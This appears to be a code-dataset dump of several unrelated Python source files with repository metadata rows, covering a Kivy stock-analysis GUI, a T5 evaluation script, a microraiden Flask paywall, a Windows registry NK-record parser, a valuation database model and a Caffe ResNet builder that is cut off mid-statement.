warnings.simplefilter("ignore", DeprecationWarning)
# noinspection PyDeprecation
self.assertEqual(self.content, payload.data)
class TestBrokerMessageV1Status(unittest.TestCase):
def test_success(self):
self.assertEqual(BrokerMessageV1Status.SUCCESS, BrokerMessageV1Status(200))
def test_error(self):
self.assertEqual(BrokerMessageV1Status.ERROR, BrokerMessageV1Status(400))
def test_system_error(self):
self.assertEqual(BrokerMessageV1Status.SYSTEM_ERROR, BrokerMessageV1Status(500))
def test_unknown(self):
self.assertEqual(BrokerMessageV1Status.UNKNOWN, BrokerMessageV1Status(56))
if __name__ == "__main__":
unittest.main()
| 39.717687 | 117 | 0.525649 | 11,284 | 0.966344 | 0 | 0 | 0 | 0 | 0 | 0 | 2,092 | 0.179156 |
2ca60d18fc13936a81ea6a0a815cdddc87a28ba9 | 231 | py | Python | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 3 | 2021-08-05T05:09:36.000Z | 2021-11-29T23:59:35.000Z | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 1 | 2021-09-09T09:19:03.000Z | 2022-02-14T13:49:10.000Z | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 2 | 2021-07-06T13:06:06.000Z | 2021-08-21T00:02:02.000Z | from invoke import Collection
from . import (
container,
cpython,
func,
git,
libs,
mxnet,
runtime,
)
ns = Collection(
container,
cpython,
func,
git,
libs,
mxnet,
runtime,
)
| 10.5 | 29 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2cab7c782174400d830c6863e839dd45a2ff2d54 | 2,416 | py | Python | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.app import App
import YP03
import sys
import dfgui
import pandas as pd
Builder.load_string('''
<faceTool>:
num1: num1
result: result
orientation: 'vertical'
BoxLayout:
orientation: 'horizontal'
Label:
id: num1
text: 'Stock Data Analysis'
BoxLayout:
orientation: 'horizontal'
GridLayout:
cols: 6
Label:
id: blank1
Label:
id: blank2
Button:
text: 'Execute'
height: 10
width: 30
on_press: root.display_fun(self)
Label:
text: 'EMPTY SLOT'
height: 10
width: 30
on_press:
Button:
text: "Show XLS Sheet"
height: 10
width: 30
on_press: root.graph()
Button:
text: "Clear"
height: 10
width: 30
on_press: root.clear_screen()
BoxLayout:
orientation: 'horizontal'
Label:
id: result
GridLayout:
cols: 2
size_hint_y: None
Button:
text: "Clear"
on_press: root.clear_screen()
height: 10
width: 30
BubbleButton:
text: 'Exit'
on_press: root.exit_it()
height: 10
width: 30
''')
class face_app(App):
def build(self):
return faceTool()
class faceTool(BoxLayout):
def __init__(self, **kwargs):
super(faceTool, self).__init__(**kwargs)
def display_fun(self, instance):
'''Fuction called when numeric buttons are pressed,
if the operation button is pressed the numbers after will be
on the right hand side.
'''
DayClusterNames, length = YP03.execute()
res = ''
for i in range(len(DayClusterNames)):
res = str(DayClusterNames[i])+'\n'+res
self.result.text = str(res)
def exit_it(self):
sys.exit()
def graph(self):
# xls = pd.read_excel('Res.xls')
# df = pd.DataFrame(xls)
# dfgui.show(df)
import main
def clear_screen(self):
self.result.text = ''
face_app().run()
| 23.456311 | 68 | 0.500414 | 829 | 0.343129 | 0 | 0 | 0 | 0 | 0 | 0 | 1,631 | 0.675083 |
2cacb2562c5435003dd88d26fe7c1f1e9dad64af | 3,196 | py | Python | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | null | null | null | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | null | null | null | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | 1 | 2021-11-18T08:03:28.000Z | 2021-11-18T08:03:28.000Z | from AdjacencyAttentionWithoutSelfloopTransformers import (
AdamW,
T5ForConditionalGeneration,
T5Tokenizer,
get_linear_schedule_with_warmup
)
from torch.utils.data import DataLoader
from src.dataset import JsonDatasetWQ, JsonDatasetPQ
from datetime import strftime, localtime
from tqdm.auto import tqdm
from omegaconf import OmegaConf
import pandas as pd
from core.evaluation.eval import QGEvalCap
OmegaConf.register_new_resolver("now", lambda pattern: strftime(pattern, localtime()))
def saveOutputs(inputs: list, outputs: list, targets: list) -> None:
data = pd.DataFrame(list(zip(inputs, outputs, targets)), columns =['inputs', 'outputs', 'targets'])
data.to_csv("out/outputs.csv",index=False, header=True)
def run_eval(target_src, decoded_text) -> None:
assert len(target_src) == len(decoded_text)
eval_targets = {}
eval_predictions = {}
for idx in range(len(target_src)):
eval_targets[idx] = [target_src[idx]]
eval_predictions[idx] = [decoded_text[idx]]
QGEval = QGEvalCap(eval_targets, eval_predictions)
scores = QGEval.evaluate()
return scores
class Evaluation():
def __init__(self, hparams):
self.hparams = hparams
def run(self):
# Tokenizer
tokenizer = T5Tokenizer.from_pretrained(self.hparams.experiment.model_dir, is_fast=True)
trained_model = T5ForConditionalGeneration.from_pretrained(self.hparams.experiment.model_dir)
# import test data
if self.hparams.experiment.data=="mhqg-wq":
test_dataset = JsonDatasetWQ(tokenizer, self.hparams.experiment.data_dir, "test.json",
input_max_len=self.hparams.model.max_input_length,
target_max_len=self.hparams.model.max_target_length)
test_loader = DataLoader(test_dataset, batch_size=8, num_workers=4)
trained_model.eval()
inputs = []
outputs = []
targets = []
for index, batch in enumerate(tqdm(test_loader)):
input_ids = batch['source_ids']
input_mask = batch['source_mask']
if self.hparams.training.n_gpu:
input_ids = input_ids.cuda()
input_mask = input_mask.cuda()
output = trained_model.generate(input_ids=input_ids,
attention_mask=input_mask,
max_length=self.hparams.model.max_target_length,
temperature=1.0, # 生成にランダム性を入れる温度パラメータ
repetition_penalty=1.5, # 同じ文の繰り返し(モード崩壊)へのペナルティ
)
output_text = [tokenizer.decode(ids, skip_special_tokens=True,
clean_up_tokenization_spaces=False)
for ids in output]
target_text = [tokenizer.decode(ids, skip_special_tokens=True,
clean_up_tokenization_spaces=False)
for ids in batch["target_ids"]]
input_text = [tokenizer.decode(ids, skip_special_tokens=False,
clean_up_tokenization_spaces=False)
for ids in input_ids]
inputs.extend(input_text)
outputs.extend(output_text)
targets.extend(target_text)
saveOutputs(inputs, outputs, targets)
run_eval(targets, outputs) | 36.318182 | 101 | 0.673967 | 2,181 | 0.665345 | 0 | 0 | 0 | 0 | 0 | 0 | 261 | 0.079622 |
2cad739bc31ee265b9975569c0caf1767fa299a5 | 7,344 | py | Python | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 417 | 2017-09-19T19:06:23.000Z | 2021-11-28T05:39:23.000Z | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 259 | 2017-09-19T20:42:57.000Z | 2020-11-18T01:31:41.000Z | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 126 | 2017-09-19T17:11:39.000Z | 2020-12-17T17:05:27.000Z | import logging
from flask import Response, make_response, request
from microraiden import HTTPHeaders as header
from flask_restful.utils import unpack
from microraiden.channel_manager import (
ChannelManager,
)
from microraiden.exceptions import (
NoOpenChannel,
InvalidBalanceProof,
InvalidBalanceAmount,
InsufficientConfirmations
)
import microraiden.constants as constants
from microraiden.proxy.resources.request_data import RequestData
from functools import wraps
from eth_utils import is_address
log = logging.getLogger(__name__)
class Paywall(object):
def __init__(self,
channel_manager,
light_client_proxy=None
):
super().__init__()
assert isinstance(channel_manager, ChannelManager)
assert is_address(channel_manager.channel_manager_contract.address)
assert is_address(channel_manager.receiver)
self.contract_address = channel_manager.channel_manager_contract.address
self.receiver_address = channel_manager.receiver
self.channel_manager = channel_manager
self.light_client_proxy = light_client_proxy
def access(self, resource, method, *args, **kwargs):
if self.channel_manager.node_online() is False:
return "Ethereum node is not responding", 502
if self.channel_manager.get_eth_balance() < constants.PROXY_BALANCE_LIMIT:
return "Channel manager ETH balance is below limit", 502
try:
data = RequestData(request.headers, request.cookies)
except ValueError as e:
return str(e), 409
accepts_html = (
'text/html' in request.accept_mimetypes and
request.accept_mimetypes.best != '*/*'
)
headers = {}
price = resource.price()
# payment required
if price > 0:
paywall, headers = self.paywall_check(price, data)
if paywall and accepts_html is True:
reply_data = resource.get_paywall(request.path)
return self.reply_webui(reply_data, headers)
elif paywall:
return make_response('', 402, headers)
# all ok, return actual content
resp = method(request.path, *args, **kwargs)
# merge headers, resource headers take precedence
headers_lower = {key.lower(): value for key, value in headers.items()}
lower_to_case = {key.lower(): key for key in headers}
if isinstance(resp, Response):
resource_headers = (key for key, value in resp.headers)
else:
data, code, resource_headers = unpack(resp)
for key in resource_headers:
key_lower = key.lower()
if key_lower in headers_lower:
headers.pop(lower_to_case[key_lower])
if isinstance(resp, Response):
resp.headers.extend(headers)
return resp
else:
headers.update(resource_headers)
return make_response(str(data), code, resource_headers)
def paywall_check(self, price, data):
"""Check if the resource can be sent to the client.
Returns (is_paywalled: Bool, http_headers: dict)
"""
headers = self.generate_headers(price)
if not data.balance_signature:
return True, headers
# try to get an existing channel
try:
channel = self.channel_manager.verify_balance_proof(
data.sender_address, data.open_block_number,
data.balance, data.balance_signature)
except InsufficientConfirmations as e:
log.debug('Refused payment: Insufficient confirmations (sender=%s, block=%d)' %
(data.sender_address, data.open_block_number))
headers.update({header.INSUF_CONFS: "1"})
return True, headers
except NoOpenChannel as e:
log.debug('Refused payment: Channel does not exist (sender=%s, block=%d)' %
(data.sender_address, data.open_block_number))
headers.update({header.NONEXISTING_CHANNEL: "1"})
return True, headers
except InvalidBalanceAmount as e:
log.debug('Refused payment: Invalid balance amount: %s (sender=%s, block=%d)' %
(str(e), data.sender_address, data.open_block_number))
headers.update({header.INVALID_PROOF: 1})
return True, headers
except InvalidBalanceProof as e:
log.debug('Refused payment: Invalid balance proof: %s (sender=%s, block=%d)' %
(str(e), data.sender_address, data.open_block_number))
headers.update({header.INVALID_PROOF: 1})
return True, headers
# set headers to reflect channel state
assert channel.sender is not None
assert channel.balance >= 0
headers.update(
{
header.SENDER_ADDRESS: channel.sender,
header.SENDER_BALANCE: channel.balance
})
if channel.last_signature is not None:
headers.update({header.BALANCE_SIGNATURE: channel.last_signature})
amount_sent = data.balance - channel.balance
if amount_sent != 0 and amount_sent != price:
headers[header.INVALID_AMOUNT] = 1
# if difference is 0, it will be handled by channel manager
return True, headers
# set the headers to reflect actual state of a channel
try:
self.channel_manager.register_payment(
channel.sender,
data.open_block_number,
data.balance,
data.balance_signature)
except (InvalidBalanceAmount, InvalidBalanceProof):
# balance sent to the proxy is less than in the previous proof
return True, headers
# all ok, return premium content
return False, headers
# when are these generated?
def generate_headers(self, price: int):
assert price > 0
"""Generate basic headers that are sent back for every request"""
headers = {
header.GATEWAY_PATH: constants.API_PATH,
header.RECEIVER_ADDRESS: self.receiver_address,
header.CONTRACT_ADDRESS: self.contract_address,
header.TOKEN_ADDRESS: self.channel_manager.get_token_address(),
header.PRICE: price,
'Content-Type': 'application/json'
}
return headers
def reply_webui(self, reply_data='', headers: dict={}):
headers.update({
"Content-Type": "text/html",
})
reply = make_response(reply_data, 402, headers)
for k, v in headers.items():
if k.startswith('RDN-'):
reply.set_cookie(k, str(v))
return reply
def paywall_decorator(func):
"""Method decorator for Flask's Resource object. It magically makes
every method paywalled.
Example:
class MyPaywalledResource(Resource):
method_decorators = [paywall_decorator]
"""
@wraps(func)
def wrapper(*args, **kwargs):
self = func.__self__ # get instance of the bound method
return self.paywall.access(
self,
func,
*args,
**kwargs
)
return wrapper
| 37.661538 | 91 | 0.623094 | 6,277 | 0.854711 | 0 | 0 | 233 | 0.031727 | 0 | 0 | 1,264 | 0.172113 |
2cade70f70dd65b64ba83b86b7c197557db3d502 | 4,241 | py | Python | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 6 | 2019-08-20T21:40:28.000Z | 2021-05-22T18:45:41.000Z | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 3 | 2020-01-15T17:32:23.000Z | 2021-05-22T04:07:42.000Z | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 5 | 2019-08-09T04:03:57.000Z | 2020-03-19T10:22:56.000Z |
"""
the nk-Record
=============
Offset Size Contents
0x0000 Word ID: ASCII-"nk" = 0x6B6E
0x0002 Word for the root-key: 0x2C, otherwise 0x20
0x0004 Q-Word write-date/time in windows nt notation
0x0010 D-Word Offset of Owner/Parent key
0x0014 D-Word number of sub-Keys
0x001C D-Word Offset of the sub-key lf-Records
0x0024 D-Word number of values
0x0028 D-Word Offset of the Value-List
0x002C D-Word Offset of the sk-Record
0x0030 D-Word Offset of the Class-Name
0x0044 D-Word Unused (data-trash)
0x0048 Word name-length
0x004A Word class-name length
0x004C ???? key-name
"""
import io
import enum
class NKFlag(enum.IntFlag):
UNK1 = 0x4000 #Unknown; shows up on normal-seeming keys in Vista and W2K3 hives.
UNK2 = 0x1000 #Unknown; shows up on normal-seeming keys in Vista and W2K3 hives.
UNK3 = 0x0080 #Unknown; shows up on root keys in some Vista "software" hives.
PREDEFINED_HANDLE = 0x0040 #Predefined handle; see: [10]
ASCII_NAME = 0x0020 #The key name will be in ASCII if set; otherwise it is in UTF-16LE.
SYMLINK = 0x0010 #Symlink key; see: [6]
NO_DELETE = 0x0008 #This key cannot be deleted.
ROOT = 0x0004 #Key is root of a registry hive.
FOREIGN_MOUNT = 0x0002 #Mount point of another hive.
VOLATILE = 0x0001 #Volatile key; these keys shouldn’
class NTRegistryNK:
def __init__(self):
self.magic = b'nk'
self.flags = None
self.wite_time = None
self.owner_offset = None
self.u1 = None
self.subkey_cnt_stable = None
self.subkey_cnt = None
self.offset_lf_stable = None
self.offset_lf = None
self.value_cnt = None
self.offset_value_list = None
self.offset_sk = None
self.offset_classname = None
self.sk_name_max = None
self.sk_classname_max = None
self.vl_name_max = None
self.vl_max = None
self.unknown = None
self.name_length = None
self.class_name_length = None
self.name = None
self.raw_data = None
@staticmethod
def nameparse(data):
nk = NTRegistryNK()
nk.raw_data = data
nk.flags = NKFlag(int.from_bytes(data[2:4], 'little', signed = False))
nk.name_length = int.from_bytes(data[72:74], 'little', signed = False)
encoding = 'iso-8859-15' if NKFlag.ASCII_NAME in nk.flags else 'utf-16-le'
try:
nk.name = data[76:76+nk.name_length]
nk.name = nk.name.decode(encoding)
except Exception as e:
raise e
return nk
@staticmethod
def from_bytes(data):
return NTRegistryNK.from_buffer(io.BytesIO(data))
@staticmethod
def from_buffer(buff):
nk = NTRegistryNK()
nk.magic = buff.read(2)
assert nk.magic == b'nk'
nk.flags = NKFlag(int.from_bytes(buff.read(2), 'little', signed = False))
nk.wite_time = buff.read(8)
nk.owner_offset = int.from_bytes(buff.read(4), 'little', signed = False)
nk.u1 = int.from_bytes(buff.read(4), 'little', signed = False)
nk.subkey_cnt_stable = int.from_bytes(buff.read(4), 'little', signed = False)
nk.subkey_cnt = int.from_bytes(buff.read(4), 'little', signed = False)
nk.offset_lf_stable = int.from_bytes(buff.read(4), 'little', signed = False)
nk.offset_lf = int.from_bytes(buff.read(4), 'little', signed = False)
nk.value_cnt = int.from_bytes(buff.read(4), 'little', signed = False)
nk.offset_value_list = int.from_bytes(buff.read(4), 'little', signed = False)
nk.offset_sk = int.from_bytes(buff.read(4), 'little', signed = False)
nk.offset_classname = int.from_bytes(buff.read(4), 'little', signed = False)
nk.sk_name_max = int.from_bytes(buff.read(4), 'little', signed = False)
nk.sk_classname_max = int.from_bytes(buff.read(4), 'little', signed = False)
nk.vl_name_max = int.from_bytes(buff.read(4), 'little', signed = False)
nk.vl_max = int.from_bytes(buff.read(4), 'little', signed = False)
nk.unknown = int.from_bytes(buff.read(4), 'little', signed = False)
nk.name_length = int.from_bytes(buff.read(2), 'little', signed = False)
nk.class_name_length = int.from_bytes(buff.read(2), 'little', signed = False)
encoding = 'iso-8859-15' if NKFlag.ASCII_NAME in nk.flags else 'utf-16-le'
try:
nk.name = buff.read(nk.name_length)
nk.name = nk.name.decode(encoding)
except Exception as e:
raise e
return nk
def __str__(self):
t = '== NT Registry NK block ==\r\n'
for k in self.__dict__:
t += '%s: %s \r\n' % (k, self.__dict__[k])
return t
| 33.928 | 88 | 0.710446 | 3,637 | 0.857177 | 0 | 0 | 2,221 | 0.52345 | 0 | 0 | 1,275 | 0.300495 |
2caf9720b899a568e29bea30f685e67528d45e67 | 85 | py | Python | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 25 | 2020-07-25T09:45:45.000Z | 2022-01-02T09:42:59.000Z | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 3 | 2020-12-14T22:32:47.000Z | 2021-04-16T01:06:44.000Z | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 6 | 2020-12-20T16:00:44.000Z | 2021-12-07T16:59:07.000Z | import attr
@attr.s
class HANItem:
sentences = attr.ib()
label = attr.ib()
| 10.625 | 25 | 0.623529 | 62 | 0.729412 | 0 | 0 | 70 | 0.823529 | 0 | 0 | 0 | 0 |
2cb02c7acfe67e6e6cc10232c459c4e7541db8cc | 4,637 | py | Python | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 4 | 2020-11-09T02:23:51.000Z | 2021-01-24T00:45:21.000Z | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 14 | 2020-11-09T02:31:34.000Z | 2021-12-22T10:15:47.000Z | omicron/models/valuation.py | evimacs/omicron | abe77fd25a93cf3d0d17661ae957373474724535 | [
"MIT"
] | 2 | 2021-01-24T00:45:25.000Z | 2021-12-24T06:18:37.000Z | import datetime
from typing import List, Union
import numpy as np
from sqlalchemy.dialects.postgresql import insert
from sqlalchemy.types import Date, Float, Integer, Numeric, String
import omicron
from omicron import db
from omicron.client.quotes_fetcher import get_valuation
class Valuation(db.Model):
__tablename__ = "valuation"
id = db.Column(Integer, primary_key=True)
code = db.Column(String, nullable=False)
pe = db.Column(Float)
turnover = db.Column(Float)
pb = db.Column(Float)
ps = db.Column(Float)
pcf = db.Column(Float)
capital = db.Column(Numeric)
market_cap = db.Column(Numeric)
circulating_cap = db.Column(Numeric)
circulating_market_cap = db.Column(Numeric)
pe_lyr = db.Column(Float)
frame = db.Column(Date, nullable=False)
types = {
"code": "O",
"pe": "f4",
"turnover": "f4",
"pb": "f4",
"ps": "f4",
"pcf": "f4",
"capital": "f4",
"market_cap": "f4",
"circulating_cap": "f4",
"circulating_market_cap": "f4",
"pe_lyr": "f4",
"frame": "O",
}
@classmethod
async def get(
cls,
codes: Union[List[str], str],
frame: datetime.date,
fields: List[str] = None,
n: int = 1,
) -> np.array:
"""获取一支或者多支证券的直到`date`的`n`条数据
尽管本函数提供了同时查询多支证券、多个日期市值数据的能力,但为后续处理方便,建议一次仅
查询多支证券同一日的数据;或者一支证券多日的数据。
请调用者保证截止`date`日,证券已存在`n`条市值数据。否则,每次调用都会产生一次无效的数据
库查询:函数在查询数据库后,得不到满足条件的n条数据(无论此前数据是否存到本地,都不满足
此条件),查询无效,还要再次请求上游服务器,但上游服务器的答复数据很可能就是在数据库中
已存在的数据。
无论查询条件如果,返回数据均为numpy structured array。证券代码和日期为该array的index,
记录按date字段升序排列。有多只证券的,证券之间顺序由上游服务器决定。
Args:
codes (Union[List[str], str]): [description]
frame (datetime.date): [description]
fields (List[str]): if None, then returns all columns/fields from
database/remote
n (int):
Returns:
np.array: 返回数据为numpy structured array数组,包含以下字段:
"code", "pe","turnover","pb","ps","pcf","capital","market_cap",
"circulating_cap","circulating_market_cap","pe_lyr", "date",
"""
if omicron.has_db():
fields = fields or [
"code",
"pe",
"turnover",
"pb",
"ps",
"pcf",
"capital",
"market_cap",
"circulating_cap",
"circulating_market_cap",
"pe_lyr",
"frame",
]
if isinstance(codes, str):
codes = [codes]
# 通过指定要查询的字段(即使是全部字段),避免了生成Valuation对象
query = (
cls.select(*fields).where(cls.code.in_(codes)).where(cls.frame <= frame)
)
query = query.order_by(cls.frame.desc()).limit(len(codes) * n)
records = await query.gino.all()
if records and len(records) == n * len(codes) and records[0].frame == frame:
return cls.to_numpy(records, fields)[::-1]
# if no db connection, or no result from database, then try remote fetch
return await get_valuation(codes, frame, fields, n)
@classmethod
def to_numpy(cls, records: List, fields: List[str]) -> np.array:
"""将数据库返回的查询结果转换为numpy structured array
Args:
records (List): [description]
keys (List[str]): [description]
Returns:
np.array: [description]
"""
dtypes = [(name, cls.types[name]) for name in fields]
return np.array(
[tuple(rec[name] for name in fields) for rec in records], dtype=dtypes
)
@classmethod
async def save(cls, recs: np.array):
data = [dict(zip(recs.dtype.names, x)) for x in recs]
qs = insert(cls.__table__).values(data)
return await (
qs.on_conflict_do_update(
index_elements=[cls.code, cls.frame],
set_={col: qs.excluded[col] for col in recs.dtype.names},
)
.returning(cls.id)
.gino.all()
)
@classmethod
async def get_circulating_cap(cls, code: str, frame: datetime.date, n: int):
fields = ["frame", "circulating_cap"]
return await cls.get(code, frame, fields, n)
@classmethod
async def truncate(cls):
"""truncate table in database."""
# db.bind: `https://python-gino.org/docs/en/master/explanation/engine.html`
await db.bind.status(f"truncate table {cls.__tablename__}")
| 31.331081 | 88 | 0.563727 | 5,015 | 0.946762 | 0 | 0 | 4,146 | 0.782707 | 3,574 | 0.674722 | 2,317 | 0.437417 |
2cb12c4d4584cf6f238a2a2f0fe96c07ce3365fd | 8,064 | py | Python | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | 1 | 2020-06-03T12:53:43.000Z | 2020-06-03T12:53:43.000Z | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | null | null | null | examples/resnet-v1/resnet_v1.py | statisticszhang/Image-classification-caffe-model | 33084ca0841e768dae84db582e15bb29ffeeaaec | [
"MIT"
] | null | null | null | import caffe
from caffe import layers as L
from caffe import params as P
def conv_bn_scale_relu(bottom, num_output=64, kernel_size=3, stride=1, pad=0):
conv = L.Convolution(bottom, num_output=num_output, kernel_size=kernel_size, stride=stride, pad=pad,
param=[dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],
weight_filler=dict(type='xavier', std=0.01),
bias_filler=dict(type='constant', value=0))
conv_bn = L.BatchNorm(conv, use_global_stats=False, in_place=True)
conv_scale = L.Scale(conv, scale_param=dict(bias_term=True), in_place=True)
conv_relu = L.ReLU(conv, in_place=True)
return conv, conv_bn, conv_scale, conv_relu
def conv_bn_scale(bottom, num_output=64, kernel_size=3, stride=1, pad=0):
conv = L.Convolution(bottom, num_output=num_output, kernel_size=kernel_size, stride=stride, pad=pad,
param=[dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],
weight_filler=dict(type='xavier', std=0.01),
bias_filler=dict(type='constant', value=0.2))
conv_bn = L.BatchNorm(conv, use_global_stats=False, in_place=True)
conv_scale = L.Scale(conv, scale_param=dict(bias_term=True), in_place=True)
return conv, conv_bn, conv_scale
def eltwize_relu(bottom1, bottom2):
residual_eltwise = L.Eltwise(bottom1, bottom2, eltwise_param=dict(operation=1))
residual_eltwise_relu = L.ReLU(residual_eltwise, in_place=True)
return residual_eltwise, residual_eltwise_relu
def residual_branch(bottom, base_output=64):
"""
input:4*base_output x n x n
output:4*base_output x n x n
:param base_output: base num_output of branch2
:param bottom: bottom layer
:return: layers
"""
branch2a, branch2a_bn, branch2a_scale, branch2a_relu = \
conv_bn_scale_relu(bottom, num_output=base_output, kernel_size=1) # base_output x n x n
branch2b, branch2b_bn, branch2b_scale, branch2b_relu = \
conv_bn_scale_relu(branch2a, num_output=base_output, kernel_size=3, pad=1) # base_output x n x n
branch2c, branch2c_bn, branch2c_scale = \
conv_bn_scale(branch2b, num_output=4 * base_output, kernel_size=1) # 4*base_output x n x n
residual, residual_relu = \
eltwize_relu(bottom, branch2c) # 4*base_output x n x n
return branch2a, branch2a_bn, branch2a_scale, branch2a_relu, branch2b, branch2b_bn, branch2b_scale, branch2b_relu, \
branch2c, branch2c_bn, branch2c_scale, residual, residual_relu
def residual_branch_shortcut(bottom, stride=2, base_output=64):
"""
:param stride: stride
:param base_output: base num_output of branch2
:param bottom: bottom layer
:return: layers
"""
branch1, branch1_bn, branch1_scale = \
conv_bn_scale(bottom, num_output=4 * base_output, kernel_size=1, stride=stride)
branch2a, branch2a_bn, branch2a_scale, branch2a_relu = \
conv_bn_scale_relu(bottom, num_output=base_output, kernel_size=1, stride=stride)
branch2b, branch2b_bn, branch2b_scale, branch2b_relu = \
conv_bn_scale_relu(branch2a, num_output=base_output, kernel_size=3, pad=1)
branch2c, branch2c_bn, branch2c_scale = \
conv_bn_scale(branch2b, num_output=4 * base_output, kernel_size=1)
residual, residual_relu = \
eltwize_relu(branch1, branch2c) # 4*base_output x n x n
return branch1, branch1_bn, branch1_scale, branch2a, branch2a_bn, branch2a_scale, branch2a_relu, branch2b, \
branch2b_bn, branch2b_scale, branch2b_relu, branch2c, branch2c_bn, branch2c_scale, residual, residual_relu
branch_shortcut_string = 'n.res(stage)a_branch1, n.res(stage)a_branch1_bn, n.res(stage)a_branch1_scale, \
n.res(stage)a_branch2a, n.res(stage)a_branch2a_bn, n.res(stage)a_branch2a_scale, n.res(stage)a_branch2a_relu, \
n.res(stage)a_branch2b, n.res(stage)a_branch2b_bn, n.res(stage)a_branch2b_scale, n.res(stage)a_branch2b_relu, \
n.res(stage)a_branch2c, n.res(stage)a_branch2c_bn, n.res(stage)a_branch2c_scale, n.res(stage)a, n.res(stage)a_relu = \
residual_branch_shortcut((bottom), stride=(stride), base_output=(num))'
branch_string = 'n.res(stage)b(order)_branch2a, n.res(stage)b(order)_branch2a_bn, n.res(stage)b(order)_branch2a_scale, \
n.res(stage)b(order)_branch2a_relu, n.res(stage)b(order)_branch2b, n.res(stage)b(order)_branch2b_bn, \
n.res(stage)b(order)_branch2b_scale, n.res(stage)b(order)_branch2b_relu, n.res(stage)b(order)_branch2c, \
n.res(stage)b(order)_branch2c_bn, n.res(stage)b(order)_branch2c_scale, n.res(stage)b(order), n.res(stage)b(order)_relu = \
residual_branch((bottom), base_output=(num))'
class ResNet(object):
def __init__(self, lmdb_train, lmdb_test, num_output):
self.train_data = lmdb_train
self.test_data = lmdb_test
self.classifier_num = num_output
def resnet_layers_proto(self, batch_size, phase='TRAIN', stages=(3, 4, 6, 3)):
"""
:param batch_size: the batch_size of train and test phase
:param phase: TRAIN or TEST
:param stages: the num of layers = 2 + 3*sum(stages), layers would better be chosen from [50, 101, 152]
{every stage is composed of 1 residual_branch_shortcut module and stage[i]-1 residual_branch
modules, each module consists of 3 conv layers}
(3, 4, 6, 3) for 50 layers; (3, 4, 23, 3) for 101 layers; (3, 8, 36, 3) for 152 layers
"""
n = caffe.NetSpec()
if phase == 'TRAIN':
source_data = self.train_data
mirror = True
else:
source_data = self.test_data
mirror = False
n.data, n.label = L.Data(source=source_data, backend=P.Data.LMDB, batch_size=batch_size, ntop=2,
transform_param=dict(crop_size=224, mean_value=[104, 117, 123], mirror=mirror))
n.conv1, n.conv1_bn, n.conv1_scale, n.conv1_relu = \
conv_bn_scale_relu(n.data, num_output=64, kernel_size=7, stride=2, pad=3) # 64x112x112
n.pool1 = L.Pooling(n.conv1, kernel_size=3, stride=2, pool=P.Pooling.MAX) # 64x56x56
for num in xrange(len(stages)): # num = 0, 1, 2, 3
for i in xrange(stages[num]):
if i == 0:
stage_string = branch_shortcut_string
bottom_string = ['n.pool1', 'n.res2b%s' % str(stages[0] - 1), 'n.res3b%s' % str(stages[1] - 1),
'n.res4b%s' % str(stages[2] - 1)][num]
else:
stage_string = branch_string
if i == 1:
bottom_string = 'n.res%sa' % str(num + 2)
else:
bottom_string = 'n.res%sb%s' % (str(num + 2), str(i - 1))
exec (stage_string.replace('(stage)', str(num + 2)).replace('(bottom)', bottom_string).
replace('(num)', str(2 ** num * 64)).replace('(order)', str(i)).
replace('(stride)', str(int(num > 0) + 1)))
exec 'n.pool5 = L.Pooling((bottom), pool=P.Pooling.AVE, global_pooling=True)'.\
replace('(bottom)', 'n.res5b%s' % str(stages[3] - 1))
n.classifier = L.InnerProduct(n.pool5, num_output=self.classifier_num,
param=[dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],
weight_filler=dict(type='xavier'),
